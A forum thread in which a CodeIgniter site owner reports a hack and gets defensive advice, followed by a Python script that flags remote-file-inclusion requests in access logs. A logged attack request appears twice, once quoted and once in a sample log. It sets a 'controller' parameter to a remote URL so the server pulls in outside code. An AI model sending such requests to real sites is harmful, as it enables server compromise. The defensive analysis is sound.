Help! My Codeigniter site was hacked

#1
[eluser]gfields[/eluser]
Hi guys,
My website, based on CodeIgniter 1.7.2, was hacked again with PHP injection.
They modified the htaccess file to redirect every request to another file (common.php).

My hosting service sent me this line of the server log, which seems to be responsible for the attack:

GET /products/getprod/5/index.php?option=com_advertising&controller=http://werisetogether.org//wp-content/themes/canvas/cache/task.jpg? HTTP/1.1" 200 14501 "-" "libwww-perl/5.805"

How can I avoid this kind of attack?

Thanks for your help

Gabriele

#2
[eluser]PhilTem[/eluser]
Your .htaccess was hacked with a PHP injection? Wow, that sounds pretty awesome of the hackers. Kudos to the hackers.

But anyway, I think you can avoid such things with two easy things:

First, fix the permissions of your files. Usually your webserver runs with a different username than you might want to create/store the files with. So you can easily modify the file permissions to allow editing only by the owner but executing by everyone.

Second, always keep your CI version up-to-date. The most recent, stable, and secure "build" is v2.1.2. You're still one major version behind which is probably the most vulnerable point of your site.

And maybe a third one as well: if you've got proper code that has lots of unit testing, it shouldn't be a problem at all. And don't forget one golden rule of development:

Never trust user input

#3
[eluser]gfields[/eluser]
Thank you PhilTem, I'll follow your golden rules, but, more specifically, is it possible to prevent someone from causing all this trouble simply by appending code to the URI?

I found this code to put in the .htaccess file:

# Refuse (403 Forbidden) any request whose User-Agent header contains "libwww-perl"
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^ - [F]

What do you think? Can it be useful?

PS: OK, it's not PHP injection, but what can I call it? .htaccess injection?

#4
[eluser]PhilTem[/eluser]
If anyone appends anything to the URI, it should first of all never be a problem as long as you don't evaluate it. I could add some URI arguments to the URI of these forums; nothing should happen as long as I don't get some specific trigger (I just tried codeigniter.com/index.php?c=forums&m=viewthread and got a 404, just to show you what I mean).

Googling a little on your problem taught me some things about PHP injection that I didn't know before.
In particular, I had a closer look at these two pages
http://isc.sans.edu/diary.html?storyid=9478
http://www.v-nessa.net/2006/12/30/php-in...or-dummies

This might also help you understand the dangers of PHP injection.

On your .htaccess code: I'm not that familiar with rewrite conditions, but from what I know about them your code looks good and should hopefully prevent any further hacks.

Maybe you should also put a security check on the controller argument in your URI and first see if it is a valid URL (i.e. resolving to a server) before working with that argument.
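A defender-side check for the request pattern quoted in post #1, as an added example that is not code from this thread or from CodeIgniter: it parses combined-format access-log lines, flags any query parameter whose value is a remote URL, and rates the hit high when the parameter name is one that commonly feeds an include (controller, page, file, ...). The sample log lines and the INCLUDE_PARAMS list are constructed for the example; note that matching on User-Agent alone, as in the rule from post #3, is weaker because the client controls that header.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Combined log format line, as written by Apache and similar servers.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# Constructed list of parameter names that often end up in include()/require()
# in PHP apps; a remote URL in one of these is the classic remote-file-inclusion probe.
INCLUDE_PARAMS = {"controller", "page", "file", "path", "include", "template", "module"}
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)

def classify(line):
    """Return a finding dict if a query parameter carries a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    flagged = [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
               if REMOTE_RE.match(value)]
    if not flagged:
        return None
    names = [name for name, _ in flagged]
    # High severity only when the remote URL lands in an include-style parameter;
    # a URL in an ordinary search parameter is noise most of the time.
    severity = "high" if any(n.lower() in INCLUDE_PARAMS for n in names) else "low"
    return {
        "ip": m.group("ip"),
        "params": names,
        "severity": severity,
        "status": int(m.group("status")),
        "ua": m.group("ua"),
    }

def scan(log_text):
    """Classify every line of an access log and return the findings in file order."""
    return [f for f in (classify(ln) for ln in log_text.splitlines()) if f]

# Constructed sample lines: the first reproduces the request shape quoted in the
# thread, the other two are benign traffic (one with a URL in a search parameter).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2012:03:14:07 +0000] "GET /products/getprod/5/index.php?option=com_advertising&controller=http://werisetogether.org//wp-content/themes/canvas/cache/task.jpg? HTTP/1.1" 200 14501 "-" "libwww-perl/5.805"
198.51.100.4 - - [10/Aug/2012:03:15:01 +0000] "GET /products/getprod/5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2012:03:16:22 +0000] "GET /search?q=http%3A%2F%2Fexample.com HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A status of 200 on a flagged request, as in the first sample line, is the signal to investigate: the application answered the probe instead of rejecting it.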
